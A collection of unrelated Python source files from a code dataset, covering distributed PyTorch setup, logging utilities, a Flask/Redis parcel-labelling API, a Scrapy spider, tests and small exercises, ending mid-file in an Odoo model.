Time_matrix[action[0]-1][action[1]-1][state[1]][state[2]]\n \n if not ((state[2]+(active_next_time // 24)) > 6):\n if (active_next_time // 24 >= 1):\n next_state = (action[1],(active_next_time % 24), state[2]+(active_next_time // 24))\n else:\n next_state = (action[1], active_next_time , state[2] )\n else:\n if(active_next_time // 24 >= 1):\n next_state = (action[1],(active_next_time % 24) , (active_next_time // 24)-1)\n else:\n next_state = (action[1], active_next_time , state[2] )\n return next_state\n\n\n\n\n def reset(self):\n return self.action_space, self.state_space, self.state_init\n","sub_path":"Env.py","file_name":"Env.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"439265954","text":"import os\nimport re\nimport socket\nimport torch\nimport torch.distributed\n# import torch.multipro\n\ndef init_slurm(fn, backend=\"gloo\"):\n slurm_nodelist = os.environ[\"SLURM_NODELIST\"]\n root_node = slurm_nodelist.split(\" \")[0].split(\",\")[0]\n if \"[\" in root_node:\n name, numbers = root_node.split(\"[\", maxsplit=1)\n number = numbers.split(\",\", maxsplit=1)[0]\n if \"-\" in number:\n number = number.split(\"-\")[0]\n number = re.sub(\"[^0-9]\", \"\", number)\n root_node = name + number\n os.environ[\"MASTER_ADDR\"] = root_node\n\n port = os.environ[\"SLURM_JOB_ID\"]\n port = port[-4:] # use the last 4 numbers in the job id as the id\n port = int(port) + 15000 # all ports should be in the 10k+ range\n os.environ[\"MASTER_PORT\"] = str(port)\n\n rank = int(os.environ[\"SLURM_PROCID\"])\n world_size = int(os.environ[\"SLURM_NTASKS\"])\n torch.distributed.init_process_group(backend, rank=rank, world_size=world_size)\n fn()\n\ndef _local_init_process(rank, size, fn, backend):\n os.environ[\"MASTER_ADDR\"] = \"127.0.0.1\"\n os.environ[\"MASTER_PORT\"] = \"12910\"\n torch.distributed.init_process_group(backend, rank=rank, world_size=size)\n fn()\n\ndef init_local(size, fn, backend=\"gloo\"):\n import torch.multiprocessing\n\n processes = []\n torch.multiprocessing.set_start_method(\"spawn\")\n for rank in range(size):\n p = torch.multiprocessing.Process(target=_local_init_process, args=(rank, size, fn, backend))\n p.start()\n processes.append(p)\n\n for p in processes:\n p.join()\n\n\ndef run():\n print(\n \"Hello from process {} on node {} out of {}\"\n \"\".format(torch.distributed.get_rank(), socket.gethostname(), torch.distributed.get_world_size())\n )\n\ndef main():\n if \"SLURM_JOB_ID\" in os.environ:\n init_slurm(run)\n else:\n init_local(torch.cuda.device_count(), run)\n\nif __name__ == '__main__':\n main()\n","sub_path":"distributed_example.py","file_name":"distributed_example.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"329965733","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n log setup, including system log and business log\n 使用的时候在程序启动后加载init_logger进行初始化,需要打印日志的py文件中加载INFO,ERROR进行日志输出\n\"\"\"\n\nimport os\nimport time\nimport inspect\nimport logging\nimport stat\nimport logging.handlers\n\nLOG_PATH = '/flask/'\nG_SYS_LOGGER = None\nG_MSG_LOGGER = None\nG_MODULE_NAME = \"\"\nG_FUNCTION_NAME = \"\"\n\n\ndef __sys_logger():\n \"\"\"\n get system logger\n :return:\n \"\"\"\n global G_SYS_LOGGER, G_MODULE_NAME, G_FUNCTION_NAME\n\n date_now = ''\n base_dir = os.path.join(LOG_PATH, date_now)\n if not os.path.isdir(base_dir):\n os.makedirs(base_dir)\n os.chmod(base_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n log_dir = os.path.join(base_dir, G_MODULE_NAME, 'log')\n if not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n os.chmod(log_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n log_file = os.path.join(log_dir, G_FUNCTION_NAME + '.log')\n if not os.path.exists(log_file):\n tmp_file = open(log_file, 'w')\n tmp_file.close()\n G_SYS_LOGGER = SystemLog(log_file)\n\n if G_SYS_LOGGER is None:\n G_SYS_LOGGER = SystemLog(log_file)\n\n return G_SYS_LOGGER\n\n\ndef __msg_logger():\n \"\"\"\n get business logger\n :return:\n \"\"\"\n global G_MSG_LOGGER, G_MODULE_NAME, G_FUNCTION_NAME\n\n #date_now = time.strftime(\"%Y%m%d\", time.localtime())\n date_now = ''\n base_dir = os.path.join(LOG_PATH, date_now)\n if not os.path.isdir(base_dir):\n os.makedirs(base_dir)\n os.chmod(base_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n #log_dir = os.path.join(base_dir, G_MODULE_NAME, 'log')\n log_dir = os.path.join(base_dir, G_MODULE_NAME)\n if not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n os.chmod(log_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n log_file = os.path.join(log_dir, G_FUNCTION_NAME + '_message.log')\n if not os.path.exists(log_file):\n tmp_file = open(log_file, 'w')\n tmp_file.close()\n G_MSG_LOGGER = MessageLog(log_file)\n\n if G_MSG_LOGGER is None:\n G_MSG_LOGGER = MessageLog(log_file)\n\n return G_MSG_LOGGER\n\n\ndef init_logger(module_name='', function_name=''):\n \"\"\"\n :param module_name:\n :param function_name: \"功能非函数\"\n :return:\n \"\"\"\n global G_MODULE_NAME, G_FUNCTION_NAME\n\n if module_name and function_name:\n G_MODULE_NAME = module_name\n G_FUNCTION_NAME = function_name\n return True\n return False\n\n\ndef SYS_DEBUG(msg):\n\n __sys_logger().debug(msg)\n\n\ndef SYS_INFO(msg):\n __sys_logger().info(msg)\n\n\ndef SYS_WARN(msg):\n __sys_logger().warn(msg)\n\n\ndef SYS_ERROR(msg):\n __sys_logger().debug(msg)\n\n\ndef SYS_CRITICAL(msg):\n __sys_logger().critical(msg)\n\n\ndef DEBUG(msg):\n __msg_logger().debug(msg)\n\n\ndef INFO(msg):\n __msg_logger().info(msg)\n\n\ndef WARN(msg):\n __msg_logger().warn(msg)\n\n\ndef ERROR(msg):\n __msg_logger().error(msg)\n\n\ndef CRITICAL(msg):\n __msg_logger().critical(msg)\n\n\nclass LogBase:\n def __init__(self, logger):\n self.m_logger = logger\n\n def printf_now(self):\n return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n\n def log_message(self, level, message):\n global G_MODULE_NAME, G_FUNCTION_NAME\n frame, filename, lineno, functionname, code, unknowfield = inspect.stack()[\n 3]\n filename = os.path.abspath(filename)\n return \"%s\\t%s%s%s\\t%s:%s:%s\\t%s\" % \\\n (self.printf_now(), level, G_MODULE_NAME,\n G_FUNCTION_NAME, filename, lineno, functionname, message)\n\n def debug(self, message):\n self.m_logger.debug(self.log_message('DEBUG', message))\n\n def info(self, message):\n self.m_logger.info(self.log_message('INFO', message))\n\n def warn(self, message):\n self.m_logger.warn(self.log_message('WARN', message))\n\n def error(self, message):\n self.m_logger.error(self.log_message('ERROR', message))\n\n def critical(self, message):\n self.m_logger.critical(self.log_message('CRITICAL', message))\n\n\nclass MessageLog(LogBase):\n def __init__(self, logfile):\n logger = logging.getLogger('msg')\n logger.setLevel(logging.DEBUG)\n\n # path = os.path.abspath(logfile)\n # self._handler = logging.FileHandler(path)\n # logger.addHandler(self._handler)\n # logger.setLevel(logging.DEBUG)\n\n # create a streamhandler to output to console\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n logger.addHandler(ch)\n\n self.hdlr = logging.handlers.TimedRotatingFileHandler(logfile, when='D', interval=1, backupCount=24)\n self.hdlr.setLevel(logging.DEBUG)\n self.hdlr.suffix = \"%Y-%m-%d_%H-%M-%S.log\"\n logger.addHandler(self.hdlr)\n\n LogBase.__init__(self, logger)\n\n def ___del__(self):\n # self._handler.flush()\n # self.m_logger.removeHandler(self._handler)\n self.hdlr\n self.m_logger.removeHandler(self.hdlr)\n\n\n\nclass SystemLog(LogBase):\n def __init__(self, logfile):\n path = os.path.abspath(logfile)\n self._handler = logging.FileHandler(path)\n logger = logging.getLogger('sys')\n logger.addHandler(self._handler)\n logger.setLevel(logging.INFO)\n LogBase.__init__(self, logger)\n\n def ___del__(self):\n self._handler.flush()\n self.m_logger.removeHandler(self._handler)\n\n\ndef logger_setup(logger_name='', file_name='/intellif/server.log'):\n \"\"\"used to single file\n :param logger_name:\n :param file_name:\n :return:\n \"\"\"\n logger = logging.getLogger(logger_name)\n logger.setLevel(level=logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n '%Y-%m-%d %H:%M:%S')\n\n handler = logging.FileHandler(file_name)\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n\n console_handler = logging.StreamHandler()\n console_handler.formatter = formatter\n console_handler.setLevel(logging.DEBUG)\n logger.addHandler(console_handler)","sub_path":"logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"389939373","text":"#!/usr/bin/env python2.7\n__author__ = 'berm2224'\n\n\"Local modules\"\nimport postproc_registration as postreg\nimport os\nimport multiprocessing as multip\nfrom functools import partial\n\n\nif __name__ == \"__main__\":\n print(\"postproc_registration.py is being run directly\")\n\n #os.chdir(\"/mnt/SSDDATA/chirurgie/davidfortin/Nolette_2013_10_30\")\n\n reg = postreg.Registration(outputfolder='test_reg')\n \"\"\"regpool = multip.Pool()\n \n reg_fmri_to_T1 = partial(postreg.ANTS_registration,\n samemode=False,\n nonlinear=False,\n path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir, 'reg'),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n inputname='fingertap_r_meanvol',\n outname='fmri_2_T2',\n refname='t1_in_t2')\n regpool.map_async(reg_fmri_to_T1,[1])\n\n regpool.join()\n regpool.close()\"\"\"\n\n warppool = multip.Pool()\n\n\n warp_corrZ_to_T1 = partial(postreg.ANTS_apply_warp,\n path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_tranf=os.path.join(reg.ABS_outputdir,'reg'),\n inputname='fingertap_r_corr_Z_pos',\n outname='fingertap_r_corr_Z_T2space',\n refname='t1_in_t2',\n tranfprefix='fmri_2_T2')\n warppool.map_async(warp_corrZ_to_T1, [1])\n\n warp_meanvol_to_T1 = partial(postreg.ANTS_apply_warp,\n path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_tranf=os.path.join(reg.ABS_outputdir, 'reg'),\n inputname='fingertap_r_meanvol',\n outname='fingertap_r_meanvol_T2space',\n refname='t1_in_t2',\n tranfprefix='fmri_2_T2')\n warppool.map_async(warp_meanvol_to_T1, [1])\n\n warp_corrZ_to_T1 = partial(postreg.ANTS_apply_warp,\n path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_tranf=os.path.join(reg.ABS_outputdir, 'reg'),\n inputname='pied_r_corr_Z_pos',\n outname='pied_r_corr_Z_T2space',\n refname='t1_in_t2',\n tranfprefix='fmri_2_T2')\n warppool.map_async(warp_corrZ_to_T1, [1])\n\n warppool.join()\n\nelse:\n print(\"postproc_vesselness.py is imported into another module\")\n","sub_path":"postproc_chirurgie.py","file_name":"postproc_chirurgie.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"352238678","text":"import os\nimport tempfile\nfrom pathlib import Path\nfrom unittest.mock import Mock\nfrom copy import deepcopy\nimport pytest\n\nfrom memestra import memestra, nbmemestra\nfrom pyls_memestra.plugin import format_text, pyls_lint, pyls_settings\nfrom pylsp import uris\nfrom pylsp.config.config import Config\nfrom pylsp.workspace import Workspace, Document\n\nhere = Path(__file__).parent\ndata = here / \"data\"\n\n@pytest.fixture\ndef config(tmpdir):\n config = Config(uris.from_fs_path(str(tmpdir)), {}, 0, {})\n config.update(pyls_settings())\n return config\n\n@pytest.fixture\ndef workspace(tmpdir, config):\n ws = Workspace(uris.from_fs_path(str(tmpdir)), Mock())\n ws._config = config\n return ws\n\n@pytest.yield_fixture\ndef document(workspace):\n temp_file = tempfile.NamedTemporaryFile(mode='w', delete=False)\n\n def write_doc(text):\n temp_file.write(text)\n temp_file.close()\n doc = Document(uris.from_fs_path(temp_file.name), workspace)\n return doc\n\n yield write_doc\n os.remove(temp_file.name)\n\ndef build_diagnostic(name, start, end, reason, source=\"memestra\", severity=3):\n if reason is None:\n message = name + \" is deprecated.\"\n else:\n message = name + \" is deprecated. \" + reason\n\n return {\n \"source\": source,\n \"range\": {\n \"start\": {\n \"line\": start[0],\n \"character\": start[1]\n },\n \"end\": {\n \"line\": end[0],\n \"character\": end[1]\n }\n },\n \"message\": message,\n \"severity\": severity\n }\n\ndef update_setting(config, name, value):\n settings = deepcopy(config._settings)\n settings[\"plugins\"][\"pyls-memestra\"][name] = value\n config.update(settings)\n\ndef test_basic(workspace, config):\n doc = Document(uris.from_fs_path(str(data / \"file.py\")), workspace)\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 4), (7, 7), \"deprecated at some point\"),\n build_diagnostic(\"imported\", (9, 0), (9, 8), \"test reason\"),\n ]\n\ndef test_decorator_name(workspace, config, document):\n doc = document(\"\"\"\nimport bogus\n\n@bogus.deprecateme(\"nope\")\ndef foo():\n pass\n\nfoo()\n\"\"\")\n update_setting(config, \"decorator_module\", \"bogus\")\n update_setting(config, \"decorator_function\", \"deprecateme\")\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 0), (7, 3), \"nope\"),\n ]\n\ndef test_reason_keyword(workspace, config, document):\n doc = document(\"\"\"\nimport deprecated\n\n@deprecated.deprecated(excuse=\"too old\")\ndef foo():\n pass\n\nfoo()\n\"\"\")\n update_setting(config, \"reason_keyword\", \"excuse\")\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 0), (7, 3), \"too old\"),\n ]\n\ndef test_empty_reason(workspace, config, document):\n doc = document(\"\"\"\nimport deprecated\n\n@deprecated.deprecated\ndef foo():\n pass\n\nfoo()\n\"\"\")\n update_setting(config, \"reason_keyword\", \"excuse\")\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 0), (7, 3), None),\n ]\n\n@pytest.mark.skip(\"This test needs improvements to memestra imports\")\ndef test_recursive(workspace, config, document):\n doc = document(\"\"\"\nfrom testpackage import bar\n\nbar()\n\"\"\")\n update_setting(config, \"recursive\", True)\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"bar\", (3, 0), (3, 3), \"nested\"),\n ]\n\ndef test_search_paths(workspace, config, document):\n doc = document(\"\"\"\nfrom bar import bar\n\nbar()\n\"\"\")\n update_setting(config, \"additional_search_paths\",\n [str(data / \"testpackage\")])\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"bar\", (3, 0), (3, 3), \"nested\"),\n ]\n\ndef test_cache_dir(workspace, config, document):\n doc = document(\"\"\"\nfrom cachetest import bar\n\nbar()\n\"\"\")\n update_setting(config, \"additional_search_paths\", [str(data)])\n update_setting(config, \"cache_dir\", str(data / \"cache\"))\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"bar\", (3, 0), (3, 3), \"cached\"),\n ]\n\ndef test_pyls_format_text_syntax():\n keywords = [('foo', '', 7, 4, 'reason1'), ('foo', '', 9, 0, 'reason2')]\n\n result = format_text(keywords, [])\n assert result == [\n build_diagnostic(\"foo\", (6, 4), (6, 7), 'reason1'),\n build_diagnostic(\"foo\", (8, 0), (8, 3), 'reason2')\n ]\n","sub_path":"tests/test_plugin.py","file_name":"test_plugin.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"581832005","text":"class ListNode(object):\n def __init__(self, value, next=None):\n self.val = value\n self.next = next\n\n\nclass LinkedList(object):\n def __init__(self):\n self.root = None\n\n def addNode(self, data):\n if self.root is None:\n self.root = ListNode(data)\n return self.root\n else:\n cursor = self.root\n while cursor.next is not None:\n cursor = cursor.next\n cursor.next = ListNode(data)\n return self.root\n\n def listPrint(self):\n node = self.root\n while node:\n print(node.val)\n node = node.next\n\n\nclass Solution:\n def printListFromTailToHead(self, listNode):\n if not listNode:\n return []\n\n result = []\n while listNode:\n result.insert(0, listNode.val)\n listNode = listNode.next\n return result\n\n\nll = LinkedList()\nfor i in range(10):\n ll.addNode(i)\nll.listPrint()\ns = Solution()\nprint(s.printListFromTailToHead(ll.root))\n","sub_path":"06_PrintListInReversedOrder/PrintListInReversedOrder.py","file_name":"PrintListInReversedOrder.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158818138","text":"from flask import Flask, g\nfrom flask import request, make_response\nfrom flask import jsonify\nfrom flask_hal import HAL\nfrom flask_hal.document import Document, Embedded\nfrom flask_hal.link import Link\n\nfrom jwt import decode\nfrom redis import Redis\nfrom os import getenv\nfrom dotenv import load_dotenv\nfrom uuid import uuid4\n\nimport logging\n\nload_dotenv()\ndb = Redis(host=getenv(\"REDIS_HOST\"), port=getenv(\"REDIS_PORT\"), db=getenv(\"REDIS_NUM\"), password=getenv(\"REDIS_PASS\"))\nJWT_SECRET = getenv(\"JWT_SECRET\")\napp = Flask(__name__)\nHAL(app)\nlogging.basicConfig(level=logging.INFO)\n\n@app.before_request\ndef before_request_func():\n token = request.headers.get('Authorization','').replace('Bearer ','')\n try:\n g.authorization = decode(token, JWT_SECRET, algorithms=['HS256'])\n logging.info(\"Authorized: \" + g.authorization.get(\"username\"))\n except Exception as e:\n g.authorization = {}\n logging.info(\"Unauthorized: \" + str(e))\n\n@app.route('/courier/label', methods=[\"GET\"])\ndef list_labels():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get labels list\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n label_ids = db.keys(\"label:*\")\n for i, id in enumerate(label_ids):\n label_ids[i] = id.decode('utf-8')\n links=[]\n labels = []\n for id in label_ids:\n label = {}\n label['id'] = id.split(\":\")[1]\n label['name'] = db.hget(id, 'name').decode('utf-8')\n label['receiver'] = db.hget(id, 'receiver').decode('utf-8')\n label['size'] = db.hget(id, 'size').decode('utf-8')\n label['target'] = db.hget(id, 'target').decode('utf-8')\n labels.append(label)\n if db.hget(id, \"picked\").decode('utf-8') == \"false\":\n links.append(Link(f\"label:{label['name']}:pick\", f\"/courier/package/{label['id']}\"))\n response_body = {}\n response_body['labels'] = labels\n document = Document(data=response_body, links=links)\n return document.to_json(), 200\n\n@app.route('/courier/package', methods=[\"GET\"])\ndef get_packages():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get packages\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n package_ids = db.smembers(f\"courier:{username}:packages\")\n package_ids = list(package_ids)\n \n for i, id in enumerate(package_ids):\n package_ids[i] = id.decode('utf-8')\n links=[]\n packages = []\n for id in package_ids:\n package = {}\n package['id'] = id\n label_id = db.hget(f\"package:{id}\", \"label_id\").decode('utf-8')\n package['status'] = db.hget(f\"package:{id}\", \"status\").decode('utf-8')\n package['name'] = db.hget(f\"label:{label_id}\", \"name\").decode('utf-8')\n package['receiver'] = db.hget(f\"label:{label_id}\", \"receiver\").decode('utf-8')\n package['size'] = db.hget(f\"label:{label_id}\", \"size\").decode('utf-8')\n package['target'] = db.hget(f\"label:{label_id}\", \"target\").decode('utf-8')\n packages.append(package)\n links.append(Link(f\"package:{package['name']}:changestatus\", f\"/courier/package/{package['id']}\"))\n response_body = {}\n response_body['packages'] = packages\n document = Document(data=response_body, links=links)\n return document.to_json(), 200\n \n@app.route('/courier/package/', methods=[\"POST\"])\ndef create_package(label_id):\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to add package\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n if len(db.keys(f\"label:{label_id}\")) == 0:\n return error(f\"Cannot find label of id: {label_id}\", 400)\n if db.hget(f\"label:{label_id}\", \"picked\").decode('utf-8') == \"true\":\n return error(\"Already created\", 400)\n db.hset(f\"label:{label_id}\", \"picked\", \"true\")\n id = str(uuid4())\n db.hset(f\"package:{id}\", \"label_id\", label_id)\n db.hset(f\"package:{id}\", \"status\", \"ODEBRANA\")\n db.sadd(f\"courier:{username}:packages\", id)\n links = []\n links.append(Link('package:changestatus', f'/courier/package/{id}'))\n document = Document(data={\"message\": id}, links=links)\n db.hset(f\"notification:{label_id}\", \"new_status\", \"ODEBRANA\")\n \n return document.to_json(), 201\n\n@app.route('/courier/package/', methods=[\"PUT\"])\ndef change_status(package_id):\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to change package status\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n allowed_status = [\"ODEBRANA\", \"W DRODZE\", \"DOSTARCZONA\"]\n new_status = request.args.get('status')\n if not new_status in allowed_status:\n return error(f\"Not allowed status: {new_status}\", 400)\n db.hset(f\"package:{package_id}\", \"status\", new_status)\n label_id = db.hget(f\"package:{package_id}\", \"label_id\")\n label_id = label_id.decode('utf-8')\n links = []\n document = Document(data={\"message\": f\"Status changed into {new_status}\"}, links=links)\n db.hset(f\"notification:{label_id}\", \"new_status\", new_status)\n return document.to_json(), 200\n\n@app.route('/sender/notification', methods=[\"GET\"])\ndef get_all_notifications():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get notifications\", 401)\n if usertype != \"sender\":\n return error(\"Resource available only for senders\", 401)\n label_ids = db.smembers(f\"user:{username}:labels\")\n label_ids = list(label_ids)\n \n for i, id in enumerate(label_ids):\n label_ids[i] = id.decode('utf-8')\n notifications = []\n for id in label_ids:\n if db.exists(f\"notification:{id}\"):\n notification = {}\n notification['new_status'] = db.hget(f\"notification:{id}\", \"new_status\").decode('utf-8')\n notification['label'] = db.hget(f\"label:{id}\", \"name\").decode('utf-8')\n notifications.append(notification)\n db.delete(f\"notification:{id}\")\n response_body = {}\n response_body['notifications'] = notifications\n document = Document(data=response_body, links=[])\n return document.to_json(), 200\n \n\n@app.route('/sender/label', methods=[\"GET\"])\ndef get_labels():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get labels\", 401)\n if usertype != \"sender\":\n return error(\"Resource available only for senders\", 401)\n label_ids = db.smembers(f\"user:{username}:labels\")\n label_ids = list(label_ids)\n \n for i, id in enumerate(label_ids):\n label_ids[i] = id.decode('utf-8')\n links=[]\n labels = []\n for id in label_ids:\n label = {}\n label['id'] = id\n label['name'] = db.hget(f\"label:{id}\", \"name\").decode('utf-8')\n label['receiver'] = db.hget(f\"label:{id}\", \"receiver\").decode('utf-8')\n label['size'] = db.hget(f\"label:{id}\", \"size\").decode('utf-8')\n label['target'] = db.hget(f\"label:{id}\", \"target\").decode('utf-8')\n labels.append(label)\n if db.hget(f\"label:{id}\", \"picked\").decode('utf-8') == \"false\":\n links.append(Link(f\"label:{label['id']}:delete\", f\"/sender/label/{id}\"))\n response_body = {}\n response_body['labels'] = labels\n document = Document(data=response_body, links=links)\n return document.to_json(), 200\n\n@app.route('/sender/label', methods=[\"POST\"])\ndef add_label():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to add labels\", 401)\n if usertype != 'sender':\n return error(\"Resource available only for senders\", 401)\n id = str(uuid4())\n name = request.form.get(\"name\")\n receiver = request.form.get(\"receiver\")\n size = request.form.get(\"size\")\n target = request.form.get(\"target\")\n if not name:\n return error(\"No value of name\", 400)\n if not receiver:\n return error(\"No value of receiver\", 400)\n if not size:\n return error(\"No value of size\", 400)\n if not target:\n return error(\"No value of target\", 400)\n db.hset(f\"label:{id}\", \"name\", name)\n db.hset(f\"label:{id}\", \"receiver\", receiver)\n db.hset(f\"label:{id}\", \"size\", size)\n db.hset(f\"label:{id}\", \"target\", target)\n db.hset(f\"label:{id}\", \"picked\", \"false\")\n db.sadd(f\"user:{username}:labels\", id)\n links = []\n links.append(Link('label:delete', f'/sender/label/{id}'))\n document = Document(data={\"message\": id}, links=links)\n return document.to_json(), 201\n\n@app.route('/sender/label/', methods=[\"DELETE\"])\ndef delete_label(label_id):\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to delete labels\", 401)\n if usertype != 'sender':\n return error(\"Resource available only for senders\", 401)\n\n if not db.sismember(f\"user:{username}:labels\", label_id):\n return error(f\"No such label for user {username}\", 403)\n if db.hget(f\"label:{label_id}\", \"picked\").decode('utf-8') == \"true\":\n return error(\"Cannot remove picked label\", 403)\n db.delete(f\"label:{label_id}\")\n db.srem(f\"user:{username}:labels\", label_id)\n document = Document(data={\"message\": label_id}, links=[])\n return document.to_json(), 200\n\n@app.route('/sender', methods=[\"GET\"])\ndef sender():\n links = []\n links.append(Link('label', '/sender/label'))\n document = Document(data={}, links=links)\n return document.to_json(), 200\n\n@app.route('/courier', methods=[\"GET\"])\ndef courier():\n links = []\n links.append(Link('label', '/courier/label'))\n links.append(Link('label', '/courier/package'))\n document = Document(data={}, links=links)\n return document.to_json(), 200\n\n@app.route('/', methods=[\"GET\"])\ndef info():\n links = []\n links.append(Link('sender', '/sender'))\n links.append(Link('courier', '/courier'))\n document = Document(data={}, links=links)\n return document.to_json(), 200\n\ndef error(msg, status=400):\n return make_response({\"status\":\"error\", \"message\":msg}, status)\n\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)","sub_path":"web-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"43355441","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass SnippetsSpider(scrapy.Spider):\n name = 'snippets'\n allowed_domains = ['syntaxdb.com']\n start_urls = ['https://syntaxdb.com/reference/']\n\n def parse(self, response):\n dropdown = response.xpath(\"//ul[@id='language-dropdown']\")\n for a in dropdown.xpath(\"./li/a\"):\n yield response.follow(\n url=a.xpath(\".//@href\").get(), \n callback=self.parse_language, \n meta={'language': a.xpath(\"./text()\").get()}\n )\n \n def parse_language(self, response):\n \n for ul_c in response.xpath(\"//ul[@class='collapsible']\"):\n for li in ul_c.xpath(\"./li/div/ul/li\"):\n yield response.follow(\n url=li.xpath(\".//@href\").get(),\n callback=self.parse_snippet,\n meta={\n 'language': response.request.meta['language'],\n 'title': li.xpath(\".//text()\").get(),\n }\n )\n \n def parse_snippet(self, response):\n code, example = response.xpath(\"//code[1]/text()\").getall()\n \n yield {\n 'title': response.request.meta['title'],\n 'language': response.request.meta['language'],\n 'code': code,\n 'example': example,\n 'notes': '\\n'.join(response.css(\".col.s12.m8.l8 p::text\").getall())\n }","sub_path":"SyntaxDB/SyntaxDB/spiders/snippets.py","file_name":"snippets.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"610350712","text":"from PyQt5.QtWidgets import QLabel\nfrom PyQt5.QtWidgets import QPushButton\nfrom PyQt5.QtWidgets import QVBoxLayout\nfrom PyQt5.QtWidgets import QWidget\nfrom datetime import datetime\nimport numpy as np\n\n\nclass SummaryTab(QWidget):\n '''This is a Q-Widget that acts as a tab in a QTabWidget and displays a mpl-canvas.'''\n def __init__(self, parent):\n super(QWidget, self).__init__(parent)\n self.layout = QVBoxLayout(self)\n self.centralWidget = self.window()\n self.label1 = QLabel(self)\n\n # self.refreshButton = QPushButton('get data from servers')\n # self.refreshButton.clicked.connect(self.refreshCalendarData)\n # self.layout.addWidget(self.refreshButton)\n self.layout.addWidget(self.label1)\n #self.refreshCalendarData()\n self.showSummary()\n self.setLayout(self.layout)\n\n def showSummary(self):\n curWeekNum = datetime.today().isocalendar()[1]\n outString = \"Innerhalb der letzten {0} Wochen hast du ... \\n\".format(curWeekNum)\n df = self.parent().tabs.df\n selectedCalendars = df['calName'].unique()\n for cal in selectedCalendars:\n summary = df[df['calName'] == cal].groupby('weeknum').aggregate(np.sum)\n achieved = np.sum(summary['duration'] > 5)\n outString += \"... im Projekt {0} in {1} Wochen deine Ziele erreicht \\n\".format(cal, str(achieved))\n\n outString += \"\\n\"\n self.label1.setText(outString)\n","sub_path":"gui/summaryTab.py","file_name":"summaryTab.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"414268282","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass LigneProduitEmballage(models.Model):\n _name = 'gctjara.produitemballee'\n \n _rec_name = 'name'\n \n _sql_constraints = [\n ('produitemballée', 